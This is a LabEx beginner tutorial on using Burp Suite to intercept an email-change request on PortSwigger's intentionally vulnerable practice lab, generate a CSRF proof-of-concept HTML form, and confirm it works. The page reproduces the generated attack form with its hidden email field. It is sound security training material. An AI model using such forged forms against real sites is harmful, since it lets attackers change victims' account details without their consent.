LabEx
Log InJoin Free

Generate a CSRF PoC in Burp Suite

Beginner
Practice Now

Introduction

In this lab, you will learn a fundamental technique in web application security testing: generating a Cross-Site Request Forgery (CSRF) Proof of Concept (PoC) using Burp Suite. CSRF is a type of attack that tricks a victim into submitting a malicious request. Burp Suite provides a powerful feature to automatically create a PoC, which can be used to demonstrate the vulnerability's impact.

You will use Burp Suite's proxy to intercept a request that changes the application's state (like updating an email address) and then use its "Engagement tools" to generate an HTML form that reproduces this request. This hands-on exercise will solidify your understanding of how CSRF attacks are crafted and tested.

Find a State-Changing Request (e.g., update email) in Proxy History

In this step, you will launch Burp Suite, use its built-in browser to perform an action on a target website, and then locate the corresponding request in the proxy history. A "state-changing request" is any request that modifies data on the server, such as changing a password, submitting a comment, or updating profile information.

First, let's start Burp Suite.

  1. Click on the Applications menu in the top-left corner of the screen.
  2. Go to Web and select Burp Suite Community Edition.
  3. A dialog box will appear. Keep the default settings (Temporary project) and click Next.
  4. On the next screen, select Use Burp defaults and click Start Burp.

Once Burp Suite is running, open its built-in browser.

  1. Go to the Proxy tab, and then the Intercept sub-tab.
  2. Click the Open Browser button. A new Chromium browser window will open, pre-configured to proxy traffic through Burp Suite.

Now, let's perform an action to capture. For this lab, we will use a test website from PortSwigger.

  1. In the Burp browser, navigate to the following URL:
    https://portswigger.net/web-security/csrf/lab-no-defenses
  2. Click Access the lab. You will be redirected to a blog website.
  3. Log in to the application using the credentials wiener:peter. You can find these credentials in the lab description on the page.
  4. After logging in, you will see an "Update email" form. Enter a new email address, for example, test@example.com, and click Update email.

Finally, let's find the request in Burp Suite.

  1. Go back to the Burp Suite window.
  2. Navigate to the Proxy tab and then the HTTP history sub-tab.
  3. Look through the list of requests. You should see a POST /my-account/change-email request. This is the state-changing request we want to target. Click on it to view its details in the panel below.
POST /my-account/change-email HTTP/2
Host: your-lab-id.web-security-academy.net
...

email=test%40example.com

You have now successfully intercepted and identified a state-changing request.

Right-Click the Request

In this step, you will use Burp Suite's context menu to access its advanced features. The context menu is a core part of the Burp Suite workflow, providing quick access to various tools that can be applied to a selected request.

With the POST /my-account/change-email request still highlighted in the Proxy > HTTP history tab, perform the following action:

  1. Move your mouse cursor over the selected request line.
  2. Right-click on the request.

This will open a large context menu with many options. This menu is context-sensitive, meaning the options available may change depending on where you click. By right-clicking on a request, you get a list of actions you can perform on that specific request, such as sending it to other Burp tools like Repeater, Intruder, or, in our case, the CSRF PoC generator.

Take a moment to look at the available options to familiarize yourself with the possibilities.

Go to Engagement tools > Generate CSRF PoC

In this step, you will navigate through the context menu to find and launch the CSRF PoC generator. This tool is categorized under "Engagement tools," which are features designed to help with demonstrating and reporting vulnerabilities.

After right-clicking the request in the previous step, the context menu is now visible. Follow these steps to generate the PoC:

  1. In the context menu, locate and hover your mouse over the Engagement tools option. This will reveal a sub-menu.
  2. From the sub-menu that appears, click on Generate CSRF PoC.

A new window titled "Generate CSRF PoC" will open. Burp Suite has automatically analyzed the POST request you selected and has generated a simple HTML page that, when submitted, will replay that same request. This is the core of a CSRF attack: tricking a user's browser into submitting a request to a website where they are already authenticated.

Review the Generated HTML Form

In this step, you will examine the HTML code generated by Burp Suite. Understanding this code is crucial to understanding how the CSRF attack works.

In the "Generate CSRF PoC" window, you will see a block of HTML code. It should look similar to the following:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      history.pushState("", "", "/");
    </script>
    <form
      action="https://your-lab-id.web-security-academy.net/my-account/change-email"
      method="POST"
    >
      <input type="hidden" name="email" value="test&#64;example&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Let's break down the key components of this HTML:

  • <form action="..." method="POST">: This defines an HTML form. The action attribute specifies the URL where the form data will be sent—in this case, the same endpoint used to change the email address. The method="POST" matches the original request's method.
  • <input type="hidden" name="email" value="...">: This is a hidden form field. It contains the parameter required by the server to perform the action. Here, it's the email parameter with the value test@example.com. Because it's hidden, a victim visiting this page wouldn't see it.
  • <input type="submit" value="Submit request" />: This creates the button that a victim would need to click to trigger the attack. In more advanced attacks, this submission can be triggered automatically using JavaScript.

This simple HTML page is a functional Proof of Concept for the CSRF vulnerability.

Use the 'Test in browser' Feature to Verify the PoC

In this step, you will use the generated PoC to confirm the CSRF vulnerability. Burp Suite makes this easy with a built-in testing feature.

In the "Generate CSRF PoC" window, you will find a button labeled Test in browser. This feature allows you to test the PoC directly in the same browser session where you are authenticated to the target application.

  1. Click the Test in browser button.
  2. Burp Suite will give you a unique URL. Click the Copy button to copy this URL to your clipboard.
  3. Go back to Burp's built-in browser (the Chromium window).
  4. Paste the copied URL into the address bar and press Enter.

A new page will load, displaying only a "Submit request" button. This is your PoC in action.

  1. Click the Submit request button.

The browser will send the POST request to the web application. Since you are already logged in (your browser has the session cookie), the application will process the request as if you made it legitimately.

To confirm the attack was successful:

  1. Navigate back to the tab with the blog application.
  2. Refresh the page or click the "My account" link.
  3. You should see that the email has been updated to test@example.com (or whatever value was in your PoC). The lab should also display a "Congratulations, you solved the lab!" message.

This confirms that the CSRF PoC works and the application is vulnerable.

Summary

In this lab, you have successfully learned how to use Burp Suite to generate and test a Cross-Site Request Forgery (CSRF) Proof of Concept.

You practiced the complete workflow for this task:

  1. Intercepting a state-changing request using Burp's proxy.
  2. Using the context menu to access Engagement tools.
  3. Generating the CSRF PoC with a single click.
  4. Analyzing the resulting HTML to understand the attack mechanism.
  5. Testing the PoC in the browser to confirm the vulnerability.

This skill is essential for any web application security professional, as it provides a clear and effective way to demonstrate the real-world impact of a CSRF flaw to developers and stakeholders.